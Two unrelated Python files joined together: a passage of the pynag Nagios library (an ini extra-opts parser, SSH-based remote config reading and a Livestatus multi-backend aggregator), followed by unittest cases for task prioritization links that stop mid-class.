        self._all_options = self.parse_file(filename=config_file) or {}

    def get_values(self):
        """ Returns a dict with all extra-options with the granted section_name and config_file

        Results are in the form of::

            {
              'key': ["possible","values"]
            }
        """
        return self._all_options.get(self.section_name, {})

    def get_default_section_name(self):
        """ According to extra-opts standard, the default should be filename of check script being run """
        return os.path.basename(sys.argv[0])

    def get_default_config_file(self):
        """ Return path to first readable extra-opt config-file found

        According to the nagiosplugins extra-opts spec the search method is as follows:

            1. Search for nagios.ini or nagios-plugins.ini in : splitted variable NAGIOS_CONFIG_PATH
            2. Search in a predefined list of files
            3. Return None if no config file is found

        The method works as follows:

        To quote the spec on NAGIOS_CONFIG_PATH:

            *"To use a custom location, set a NAGIOS_CONFIG_PATH environment
            variable to the set of directories that should be checked (this is a
            colon-separated list just like PATH). The first plugins.ini or
            nagios-plugins.ini file found in these directories will be used."*

        """
        search_path = []
        nagios_config_path = os.environ.get('NAGIOS_CONFIG_PATH', '')
        for path in nagios_config_path.split(':'):
            search_path.append(os.path.join(path, 'plugins.ini'))
            search_path.append(os.path.join(path, 'nagios-plugins.ini'))

        search_path += self.standard_locations
        # Saved for introspection/debugging by callers
        self.search_path = search_path
        for path in search_path:
            if os.path.isfile(path):
                return path
        return None

    def get(self, option_name, default=_sentinel):
        """ Return the value of one specific option

        Args:

            option_name: The value set to this option will be returned

            default: Value to return if the option is not set. If omitted,
            a missing option raises ValueError instead.

        Returns:

            The value of `option_name` (first value, if several were set)

        Raises:

            :py:class:`ValueError` when `option_name` cannot be found in options
            and no default was given

        """
        result = self.getlist(option_name, default)

        # If option was not found, raise error.
        # Identity checks ('is') are used because _sentinel/default act as
        # unique marker objects, not values to compare by equality.
        if result is _sentinel:
            raise ValueError("Option named %s was not found" % (option_name))
        elif result is default:
            return result
        elif not result:
            # empty list
            return result
        else:
            return result[0]

    def getlist(self, option_name, default=_sentinel):
        """ Return a list of all values for option_name

        Args:

            option_name: All the values set to this option will be returned

            default: Value to return if the option is not set. If omitted,
            a missing option raises ValueError instead.

        Returns:

            List containing all the options set to `option_name`

        Raises:

            :py:class:`ValueError` when `option_name` cannot be found in options
            and no default was given

        """
        result = self.get_values().get(option_name, default)
        if result is _sentinel:
            raise ValueError("Option named %s was not found" % (option_name))
        return result

    def parse_file(self, filename):
        """ Parses an ini-file and returns a dict of the ini values.

        Args:

            filename: Full path to the ini-file to be parsed. If None,
            an empty dict is returned.

        Example the following the file::

            [main]
            name = this is a name
            key = value
            key = value2

        Would return::

            {'main':
              {
                'name': ['this is a name'],
                'key': ['value', 'value2']
              }
            }

        """
        if filename is None:
            return {}

        f = open(filename)
        try:
            data = f.read()
            return self.parse_string(data)
        finally:
            f.close()

    def parse_string(self, string):
        """ Parses a string that is supposed to be ini-style format.

        See :py:meth:`parse_file` for more info

        Args:

            string: String to be parsed. Should be in ini-file format.

        Returns:

            Dictionnary containing all the sections of the ini-file and their
            respective data.

        Raises:

            :py:class:`ParserError` when line does not follow the ini format.

        """
        sections = {}
        # Name of the section currently being parsed; stays None until the
        # first [section] header has been seen.
        section_name = None

        for line_no, line in enumerate(string.splitlines()):
            line = line.strip()

            # skip empty lines and comments
            if not line or line[0] in ('#', ';'):
                continue

            # Check if this is a new section
            if line.startswith('[') and line.endswith(']'):
                section_name = line.strip('[').strip(']').strip()
                sections[section_name] = pynag.Utils.defaultdict(list)
                continue

            # All entries should have key=value format
            if not '=' in line:
                error = "Line %s should be in the form of key=value format (got '%s' instead)" % (line_no, line)
                raise ParserError(error)

            # key=value outside of any [section] header is invalid ini
            # (previously this raised a bare KeyError(None))
            if section_name is None:
                error = "Line %s: key=value pair found before any [section] header (got '%s')" % (line_no, line)
                raise ParserError(error)

            # If we reach here, we parse current line into key and a value section
            key, value = line.split('=', 1)
            key = key.strip()
            value = value.strip()

            sections[section_name][key].append(value)
        return sections


class SshConfig(Config):

    """ Parse object configuration files from remote host via ssh

    Uses python-paramiko for ssh connections.
    """

    def __init__(self, host, username, password=None, cfg_file=None):
        """ Creates a SshConfig instance

        Args:

            host: Host to connect to

            username: User to connect with

            password: Password for `username`

            cfg_file: Nagios main cfg file
        """
        # Imported lazily so paramiko is only required when SshConfig is used
        import paramiko
        self.ssh = paramiko.SSHClient()
        self.ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        self.ssh.connect(host, username=username, password=password)
        self.ftp = self.ssh.open_sftp()

        # In-memory tar archive used as a cache of remote files
        import cStringIO
        c = cStringIO.StringIO()
        self.tar = tarfile.open(mode='w', fileobj=c)

        # Cache of remote stat results keyed by full path (filled by listdir)
        self.cached_stats = {}
        super(SshConfig, self).__init__(cfg_file=cfg_file)

    def open(self, filename, *args, **kwargs):
        """ Behaves like file.open only, via ssh connection """
        # NOTE(review): the method returns on the next line; everything below
        # it is unreachable leftover debugging code.
        return self.tar.extractfile(filename)
        tarinfo = self._get_file(filename)
        string = tarinfo.tobuf()
        print string
        return StringIO.StringIO(string)
        return self.tar.extractfile(tarinfo)

    def add_to_tar(self, path):
        """ Fetch `path` (recursively) from the remote host into self.tar.

        Runs a remote `find | tar` pipeline and reads the tar stream back
        over the ssh channel.
        """
        # NOTE(review): these prints look like leftover debug output
        print "Taring ", path
        command = "find '{path}' -type f | tar -c -T - --to-stdout --absolute-names"
        command = command.format(path=path)
        print command
        stdin, stdout, stderr = self.ssh.exec_command(command, bufsize=50000)
        tar = tarfile.open(fileobj=stdout, mode='r|')
        if not self.tar:
            self.tar = tar
            # return
        else:
            # Merge the freshly fetched members into the existing archive
            for i in tar:
                self.tar.addfile(i)

    def is_cached(self, filename):
        # True if `filename` has already been fetched into the tar cache
        if not self.tar:
            return False
        return filename in self.tar.getnames()

    def _get_file(self, filename):
        """ Download filename and return the TarInfo object """
        if filename not in self.tar.getnames():
            self.add_to_tar(filename)
        return self.tar.getmember(filename)

    def get_cfg_files(self):
        # Collect every object config file referenced by cfg_file/cfg_dir
        # directives in nagios.cfg, fetching them into the tar cache as we go
        cfg_files = []
        for config_object, config_value in self.maincfg_values:

            # Add cfg_file objects to cfg file list
            if config_object == "cfg_file":
                config_value = self.abspath(config_value)
                if self.isfile(config_value):
                    cfg_files.append(config_value)
            elif config_object == "cfg_dir":
                # cfg_dir: list every *.cfg under the directory remotely
                absolut_path = self.abspath(config_value)
                command = "find '%s' -type f -iname \*cfg" % (absolut_path)
                stdin, stdout, stderr = self.ssh.exec_command(command)
                raw_filelist = stdout.read().splitlines()
                cfg_files += raw_filelist
            else:
                continue
            if not self.is_cached(config_value):
                self.add_to_tar(config_value)
        return cfg_files

    def isfile(self, path):
        """ Behaves like os.path.isfile only, via ssh connection """
        try:
            copy = self._get_file(path)
            return copy.isfile()
        except IOError:
            return False

    def isdir(self, path):
        """ Behaves like os.path.isdir only, via ssh connection """
        try:
            file_stat = self.stat(path)
            return stat.S_ISDIR(file_stat.st_mode)
        except IOError:
            return False

    def islink(self, path):
        """ Behaves like os.path.islink only, via ssh connection """
        try:
            file_stat = self.stat(path)
            return stat.S_ISLNK(file_stat.st_mode)
        except IOError:
            return False

    def readlink(self, path):
        """ Behaves like os.readlink only, via ssh connection """
        return self.ftp.readlink(path)

    def stat(self, *args, **kwargs):
        """ Wrapper around os.stat only, via ssh connection

        Returns the cached TarInfo member, augmented with st_mode/st_mtime
        aliases so it can be used like an os.stat result.
        """
        path = args[0]
        if not self.is_cached(path):
            self.add_to_tar(path)
        if path not in self.tar.getnames():
            raise IOError("No such file or directory %s" % path)
        member = self.tar.getmember(path)
        member.st_mode = member.mode
        member.st_mtime = member.mtime
        return member

    def access(self, *args, **kwargs):
        """ Wrapper around os.access only, via ssh connection """
        # NOTE(review): this checks access on the LOCAL filesystem, not the
        # remote one -- confirm whether that is intentional.
        return os.access(*args, **kwargs)

    def exists(self, path):
        """ Wrapper around os.path.exists only, via ssh connection """
        try:
            self.ftp.stat(path)
            return True
        except IOError:
            return False

    def listdir(self, *args, **kwargs):
        """ Wrapper around os.listdir  but via ssh connection """
        stats = self.ftp.listdir_attr(*args, **kwargs)
        # Remember the stat info of every entry for later lookups
        for i in stats:
            self.cached_stats[args[0] + "/" + i.filename] = i
        files = map(lambda x: x.filename, stats)
        return files


class MultiSite(Livestatus):

    """ Wrapps around multiple Livesatus instances and aggregates the results
        of queries.

        Example:
            >>> m = MultiSite()
            >>> m.add_backend(path='/var/spool/nagios/livestatus.socket', name='local')
            >>> m.add_backend(path='127.0.0.1:5992', name='remote')
    """

    def __init__(self, *args, **kwargs):
        super(MultiSite, self).__init__(*args, **kwargs)
        # Maps friendly backend name -> Livestatus instance
        self.backends = {}

    def add_backend(self, path, name):
        """ Add a new livestatus backend to this instance.

         Arguments:
            path (str):  Path to file socket or remote address
            name (str):  Friendly shortname for this backend
        """
        backend = Livestatus(
            livestatus_socket_path=path,
            nagios_cfg_file=self.nagios_cfg_file,
            authuser=self.authuser
        )
        self.backends[name] = backend

    def get_backends(self):
        """ Returns all backends added to this instance

        Returns:
            dict. Mapping of backend name to Livestatus instance
        """
        return self.backends

    def get_backend(self, backend_name):
        """ Return one specific backend that has previously been added

        If `backend_name` is empty or None, an arbitrary backend is returned.

        Raises:
            ParserError if no backend with that name was added.
        """
        if not backend_name:
            # list() keeps this working on both Python 2 and 3
            return list(self.backends.values())[0]
        try:
            return self.backends[backend_name]
        except KeyError:
            raise ParserError("No backend found with name='%s'" % backend_name)

    def query(self, query, *args, **kwargs):
        """ Behaves like mk_livestatus.query() except results are aggregated from multiple backends

        Arguments:
            backend (str): If specified, fetch only data from this backend (see add_backend())
            *args:         Passed directly to mk_livestatus.query()
            **kwargs:      Passed directly to mk_livestatus.query()
        """
        result = []
        backend = kwargs.pop('backend', None)

        # Special hack, if 'Stats' argument was provided to livestatus
        # We have to maintain compatibility with old versions of livestatus
        # and return single list with all results instead of a list of dicts
        doing_stats = any(map(lambda x: x.startswith('Stats:'), args + (query,)))

        # Iterate though all backends and run the query
        # TODO: Make this multithreaded
        for name, backend_instance in self.backends.items():
            # Skip if a specific backend was requested and this is not it
            if backend and backend != name:
                continue

            query_result = backend_instance.query(query, *args, **kwargs)
            if doing_stats:
                result = self._merge_statistics(result, query_result)
            else:
                # Tag each row with the backend it came from
                for row in query_result:
                    row['backend'] = name
                    result.append(row)

        return result

    def _merge_statistics(self, list1, list2):
        """ Merges multiple livestatus results into one result

        Arguments:
            list1 (list): List of integers
            list2 (list): List of integers

        Returns:
            list. Aggregated results of list1 + list2
        Example:
            >>> result1 = [1,1,1,1]
            >>> result2 = [2,2,2,2]
            >>> MultiSite()._merge_statistics(result1, result2)
            [3, 3, 3, 3]
        """
        if not list1:
            return list2
        if not list2:
            return list1

        # Size the result by the longer row so mismatched column counts
        # between backends cannot raise IndexError; missing columns count as 0.
        number_of_columns = max(len(list1), len(list2))
        result = [0] * number_of_columns
        for row in (list1, list2):
            for i, column in enumerate(row):
                result[i] += column
        return result

    def get_host(self, host_name, backend=None):
        """ Same as Livestatus.get_host() """
        backend = self.get_backend(backend)
        return backend.get_host(host_name)

    def get_service(self, host_name, service_description, backend=None):
        """ Same as Livestatus.get_service() """
        backend = self.get_backend(backend)
        return backend.get_service(host_name, service_description)

    def get_contact(self, contact_name, backend=None):
        """ Same as Livestatus.get_contact() """
        backend = self.get_backend(backend)
        return backend.get_contact(contact_name)

    def get_contactgroup(self, contactgroup_name, backend=None):
        """ Same as Livestatus.get_contactgroup() """
        backend = self.get_backend(backend)
        return backend.get_contactgroup(contactgroup_name)

    def get_servicegroup(self, servicegroup_name, backend=None):
        """ Same as Livestatus.get_servicegroup() """
        backend = self.get_backend(backend)
        return backend.get_servicegroup(servicegroup_name)

    def get_hostgroup(self, hostgroup_name, backend=None):
        """ Same as Livestatus.get_hostgroup() """
        backend = self.get_backend(backend)
        return backend.get_hostgroup(hostgroup_name)


class config(Config):

    """ Deprecated backwards-compatibility alias for Config. """


class mk_livestatus(Livestatus):

    """ Deprecated backwards-compatibility alias for Livestatus. """


class object_cache(ObjectCache):

    """ Deprecated backwards-compatibility alias for ObjectCache. """


class status(StatusDat):

    """ Deprecated backwards-compatibility alias for StatusDat. """


class retention(RetentionDat):

    """ Deprecated backwards-compatibility alias for RetentionDat. """


if __name__ == '__main__':
    # Ad-hoc manual test/benchmark of SshConfig against a remote host.
    import time
    start = time.time()
    ssh = SshConfig(host='status.adagios.org', username='palli')
    # Enlarge the SSH window and enable compression to speed up bulk transfers
    ssh.ssh.get_transport().window_size = 3 * 1024 * 1024
    ssh.ssh.get_transport().use_compression()

    # ssh.add_to_tar('/etc/nagios')
    # sys.exit()
    # ssh.ssh.exec_command("/bin/ls")
    print "before reset"
    ssh.parse()
    end = time.time()
    print "duration=", end - start
    bland = ssh.tar.getmember('/etc/nagios/okconfig/hosts/web-servers/bland.is-http.cfg')
    print bland.tobuf()
    sys.exit(0)
    # NOTE(review): everything below is unreachable because of sys.exit(0)
    # above. FastTransport is not defined in this module -- presumably it is
    # (or was) defined elsewhere; verify before re-enabling this code.
    print "ssh up"
    ssh_conn = FastTransport(('status.adagios.org', 22))
    ssh_conn.connect(username='palli')
    ftp = paramiko.SFTPClient.from_transport(ssh_conn)
    print "connected" \
          ""
    ssh.ssh = ssh_conn
    ssh.ftp = ftp
    print "starting parse"
    print "done parsing"

#!/usr/bin/env python

import unittest

from werkzeug.exceptions import NotFound, Forbidden

from tests.logic_t.layer.LogicLayer.util import generate_ll


class TaskPrioritizeBeforeLogicLayerTest(unittest.TestCase):
    """Exercises LogicLayer.do_add_prioritize_before_to_task and
    do_remove_prioritize_before_from_task.

    The original tests repeated the same fixture-building and
    link-assertion boilerplate in every method; it is factored into
    private helpers so each test states only what is unique to it.
    Membership checks use assertIn for clearer failure messages.
    All public test method names are unchanged.
    """

    def setUp(self):
        self.ll = generate_ll()
        self.pl = self.ll.pl

    # ------------------------------------------------------------------
    # helpers

    def _commit(self, *objects):
        # Persist the given objects in order and commit once.
        for obj in objects:
            self.pl.add(obj)
        self.pl.commit()

    def _assert_counts(self, task, after, before):
        # Assert the exact sizes of a task's prioritize lists.
        self.assertEqual(after, len(task.prioritize_after))
        self.assertEqual(before, len(task.prioritize_before))

    def _assert_unlinked(self, t1, t2):
        # Neither task has any prioritize links.
        self._assert_counts(t1, 0, 0)
        self._assert_counts(t2, 0, 0)

    def _assert_linked(self, t1, t2):
        # Exactly one link exists: t1 is prioritized before t2.
        self._assert_counts(t1, 0, 1)
        self._assert_counts(t2, 1, 0)
        self.assertIn(t2, t1.prioritize_before)
        self.assertIn(t1, t2.prioritize_after)

    # ------------------------------------------------------------------
    # add

    def test_add_prioritize_before_adds_prioritize_before(self):
        # given: two tasks sharing an authorized user
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self._commit(t1, t2, user)

        # precondition
        self._assert_unlinked(t1, t2)

        # when
        results = self.ll.do_add_prioritize_before_to_task(t1.id, t2.id, user)

        # then: the link exists and is mirrored on both tasks
        self._assert_linked(t1, t2)
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_if_already_added_still_succeeds(self):
        # given: the link already exists before the call
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        t1.prioritize_before.append(t2)
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self._commit(t1, t2, user)

        # precondition
        self._assert_linked(t1, t2)

        # when
        results = self.ll.do_add_prioritize_before_to_task(t1.id, t2.id, user)

        # then: still exactly one link, and the call reports success
        self._assert_linked(t1, t2)
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_null_ids_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self._commit(t1, t2, user)

        # precondition
        self._assert_unlinked(t1, t2)

        # expect: every combination involving a None id is rejected
        for task_id, before_id in ((None, t2.id), (t1.id, None), (None, None)):
            self.assertRaises(ValueError,
                              self.ll.do_add_prioritize_before_to_task,
                              task_id, before_id, user)

        # then: nothing changed
        self._assert_unlinked(t1, t2)

    def test_null_user_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self._commit(t1, t2, user)

        # precondition
        self._assert_unlinked(t1, t2)

        # expect
        self.assertRaises(ValueError, self.ll.do_add_prioritize_before_to_task,
                          t1.id, t2.id, None)

        # then
        self._assert_unlinked(t1, t2)

    def test_user_not_authorized_for_task_raises_exception(self):
        # given: user is only authorized on t2, not on t1
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        self._commit(t1, t2, user)

        # precondition
        self._assert_unlinked(t1, t2)

        # expect
        self.assertRaises(Forbidden, self.ll.do_add_prioritize_before_to_task,
                          t1.id, t2.id, user)

        # then
        self._assert_unlinked(t1, t2)

    def test_user_not_authorized_for_prioritize_before_raises_exception(self):
        # given: user is only authorized on t1, not on t2
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        self._commit(t1, t2, user)

        # precondition
        self._assert_unlinked(t1, t2)

        # expect
        self.assertRaises(Forbidden, self.ll.do_add_prioritize_before_to_task,
                          t1.id, t2.id, user)

        # then
        self._assert_unlinked(t1, t2)

    def test_task_not_found_raises_exception(self):
        # given
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        self._commit(t2, user)

        # precondition: t2.id + 1 does not identify any task
        self._assert_counts(t2, 0, 0)
        self.assertIsNone(self.pl.get_task(t2.id + 1))

        # expect
        self.assertRaises(NotFound, self.ll.do_add_prioritize_before_to_task,
                          t2.id + 1, t2.id, user)

        # then
        self._assert_counts(t2, 0, 0)
        self.assertIsNone(self.pl.get_task(t2.id + 1))

    def test_prioritize_before_not_found_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        self._commit(t1, user)

        # precondition: t1.id + 1 does not identify any task
        self._assert_counts(t1, 0, 0)
        self.assertIsNone(self.pl.get_task(t1.id + 1))

        # expect
        self.assertRaises(NotFound, self.ll.do_add_prioritize_before_to_task,
                          t1.id, t1.id + 1, user)

        # then
        self._assert_counts(t1, 0, 0)
        self.assertIsNone(self.pl.get_task(t1.id + 1))

    # ------------------------------------------------------------------
    # remove

    def test_remove_prioritize_before_removes_prioritize_before(self):
        # given: an existing prioritize_before link
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_before.append(t2)
        self._commit(t1, t2, user)

        # precondition
        self._assert_linked(t1, t2)

        # when
        results = self.ll.do_remove_prioritize_before_from_task(t1.id, t2.id,
                                                                user)

        # then: no links remain
        self._assert_unlinked(t1, t2)
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_if_prioritize_before_already_removed_still_succeeds(self):
        # given: no link exists
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self._commit(t1, t2, user)

        # precondition
        self._assert_unlinked(t1, t2)

        # when
        results = self.ll.do_remove_prioritize_before_from_task(t1.id, t2.id,
                                                                user)

        # then: still no links, and the call reports success
        self._assert_unlinked(t1, t2)
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_remove_prioritize_before_with_null_ids_raises_exception(self):
        # given: an existing prioritize_before link
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_before.append(t2)
        self._commit(t1, t2, user)

        # precondition
        self._assert_linked(t1, t2)

        # expect: every combination involving a None id is rejected
        for task_id, before_id in ((None, t2.id), (t1.id, None), (None, None)):
            self.assertRaises(ValueError,
                              self.ll.do_remove_prioritize_before_from_task,
                              task_id, before_id, user)

        # then: the link is unchanged
        self._assert_linked(t1, t2)

    def test_remove_prioritize_before_with_null_user_raises_exception(self):
        # given: an existing prioritize_before link
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        t1.prioritize_before.append(t2)
        self._commit(t1, t2, user)

        # precondition
        self._assert_linked(t1, t2)

        # expect
        self.assertRaises(ValueError,
                          self.ll.do_remove_prioritize_before_from_task,
                          t1.id, t2.id, None)

        # then: the link is unchanged
        self._assert_linked(t1, t2)

    def test_remove_prioritize_before_user_unauthd_raises_exception(self):
        # given: user is only authorized on t2, not on t1
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        t1.prioritize_before.append(t2)
        self._commit(t1, t2, user)
        # note that this situation shouldn't happen anyways. a task shouldn't
        # be prioritized before another task unless both share a common set of
        # one or more authorized users

        # precondition
        self._assert_linked(t1, t2)

        # expect
        self.assertRaises(Forbidden,
                          self.ll.do_remove_prioritize_before_from_task,
                          t1.id, t2.id, user)

        # then: the link is unchanged
        self._assert_linked(t1, t2)

    def test_remove_user_not_authd_for_prioritizebefore_raises_exception(self):
        # given: user is only authorized on t1, not on t2
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t1.prioritize_before.append(t2)
        self._commit(t1, t2, user)
        # note that this situation shouldn't happen anyways. a task shouldn't
        # be prioritized before another task unless both share a common set of
        # one or more authorized users

        # precondition
        self._assert_linked(t1, t2)

        # expect
        self.assertRaises(Forbidden,
                          self.ll.do_remove_prioritize_before_from_task,
                          t1.id, t2.id, user)

        # then: the link is unchanged
        self._assert_linked(t1, t2)

    def test_remove_prioritize_before_task_not_found_raises_exception(self):
        # given
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        self._commit(t2, user)

        # precondition: t2.id + 1 does not identify any task
        self._assert_counts(t2, 0, 0)
        self.assertIsNone(self.pl.get_task(t2.id + 1))

        # expect
        self.assertRaises(NotFound,
                          self.ll.do_remove_prioritize_before_from_task,
                          t2.id + 1, t2.id, user)

        # then
        self._assert_counts(t2, 0, 0)
        self.assertIsNone(self.pl.get_task(t2.id + 1))

    def test_remove_prioritize_before_when_not_found_raises_exception(self):
        # given
        t1 = self.pl.create_task('t1')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        self._commit(t1, user)

        # precondition: t1.id + 1 does not identify any task
        self._assert_counts(t1, 0, 0)
        self.assertIsNone(self.pl.get_task(t1.id + 1))

        # expect
        self.assertRaises(NotFound,
                          self.ll.do_remove_prioritize_before_from_task,
                          t1.id, t1.id + 1, user)

        # then
        self._assert_counts(t1, 0, 0)
        self.assertIsNone(self.pl.get_task(t1.id + 1))


class TaskPrioritizeAfterLogicLayerTest(unittest.TestCase):

    def setUp(self):
        """Build a fresh logic layer (and its persistence layer) per test."""
        logic_layer = generate_ll()
        self.ll = logic_layer
        self.pl = logic_layer.pl

    def test_add_prioritize_after_adds_prioritize_after(self):
        """Adding a prioritize_after link connects both tasks."""
        # given: two tasks sharing an authorized user
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition: no links yet in either direction
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))

        # when
        results = self.ll.do_add_prioritize_after_to_task(t1.id, t2.id, user)

        # then: the link exists and is mirrored on t2
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        # assertIn gives clearer failure messages than assertTrue(x in y)
        self.assertIn(t2, t1.prioritize_after)
        self.assertIn(t1, t2.prioritize_before)
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_if_already_added_still_succeeds(self):
        """Adding an already-existing prioritize_after link is a no-op that
        still reports success."""
        # given: the link already exists before the call
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        t1.prioritize_after.append(t2)
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        self.pl.add(t1)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        # assertIn gives clearer failure messages than assertTrue(x in y)
        self.assertIn(t2, t1.prioritize_after)
        self.assertIn(t1, t2.prioritize_before)

        # when
        results = self.ll.do_add_prioritize_after_to_task(t1.id, t2.id, user)

        # then: still exactly one link
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(1, len(t1.prioritize_after))
        self.assertEqual(1, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIn(t2, t1.prioritize_after)
        self.assertIn(t1, t2.prioritize_before)
        self.assertIsNotNone(results)
        self.assertEqual([t1, t2], list(results))

    def test_null_ids_raises_exception(self):
        """Passing None for either task id raises ValueError."""
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        for obj in (t1, t2, user):
            self.pl.add(obj)
        self.pl.commit()

        def assert_no_links():
            for task in (t1, t2):
                self.assertEqual(0, len(task.prioritize_before))
                self.assertEqual(0, len(task.prioritize_after))

        # precondition
        assert_no_links()

        # expect: every combination involving a None id is rejected
        for task_id, after_id in ((None, t2.id), (t1.id, None), (None, None)):
            self.assertRaises(ValueError,
                              self.ll.do_add_prioritize_after_to_task,
                              task_id, after_id, user)

        # then: nothing changed
        assert_no_links()

    def test_null_user_raises_exception(self):
        """Passing None as the user raises ValueError."""
        # given
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        t2.users.append(user)
        for obj in (t1, t2, user):
            self.pl.add(obj)
        self.pl.commit()

        def assert_no_links():
            for task in (t1, t2):
                self.assertEqual(0, len(task.prioritize_before))
                self.assertEqual(0, len(task.prioritize_after))

        # precondition
        assert_no_links()

        # expect
        self.assertRaises(ValueError, self.ll.do_add_prioritize_after_to_task,
                          t1.id, t2.id, None)

        # then: nothing changed
        assert_no_links()

    def test_user_not_authorized_for_task_raises_exception(self):
        """A user not authorized on the source task gets Forbidden."""
        # given: user is only attached to t2, not t1
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        for obj in (t1, t2, user):
            self.pl.add(obj)
        self.pl.commit()

        def assert_no_links():
            for task in (t1, t2):
                self.assertEqual(0, len(task.prioritize_before))
                self.assertEqual(0, len(task.prioritize_after))

        # precondition
        assert_no_links()

        # expect
        self.assertRaises(Forbidden, self.ll.do_add_prioritize_after_to_task,
                          t1.id, t2.id, user)

        # then: nothing changed
        assert_no_links()

    def test_user_not_authorized_for_prioritize_after_raises_exception(self):
        """A user not authorized on the target task gets Forbidden."""
        # given: user is only attached to t1, not t2
        t1 = self.pl.create_task('t1')
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        for obj in (t1, t2, user):
            self.pl.add(obj)
        self.pl.commit()

        def assert_no_links():
            for task in (t1, t2):
                self.assertEqual(0, len(task.prioritize_before))
                self.assertEqual(0, len(task.prioritize_after))

        # precondition
        assert_no_links()

        # expect
        self.assertRaises(Forbidden, self.ll.do_add_prioritize_after_to_task,
                          t1.id, t2.id, user)

        # then: nothing changed
        assert_no_links()

    def test_task_not_found_raises_exception(self):
        """A nonexistent source task id raises NotFound."""
        # given
        t2 = self.pl.create_task('t2')
        user = self.pl.create_user('name@example.com')
        t2.users.append(user)
        self.pl.add(t2)
        self.pl.add(user)
        self.pl.commit()

        # precondition: t2.id + 1 does not identify any task
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIsNone(self.pl.get_task(t2.id + 1))

        # expect
        self.assertRaises(NotFound, self.ll.do_add_prioritize_after_to_task,
                          t2.id + 1, t2.id, user)

        # then: nothing changed (spacing of `t2.id + 1` made consistent)
        self.assertEqual(0, len(t2.prioritize_before))
        self.assertEqual(0, len(t2.prioritize_after))
        self.assertIsNone(self.pl.get_task(t2.id + 1))

    def test_prioritize_after_not_found_raises_exception(self):
        """A nonexistent target task id raises NotFound."""
        # given
        t1 = self.pl.create_task('t1')
        user = self.pl.create_user('name@example.com')
        t1.users.append(user)
        self.pl.add(t1)
        self.pl.add(user)
        self.pl.commit()

        missing_id = t1.id + 1

        # precondition: missing_id identifies no task
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
        self.assertIsNone(self.pl.get_task(missing_id))

        # expect
        self.assertRaises(NotFound, self.ll.do_add_prioritize_after_to_task,
                          t1.id, missing_id, user)

        # then: nothing changed
        self.assertEqual(0, len(t1.prioritize_before))
        self.assertEqual(0, len(t1.prioritize_after))
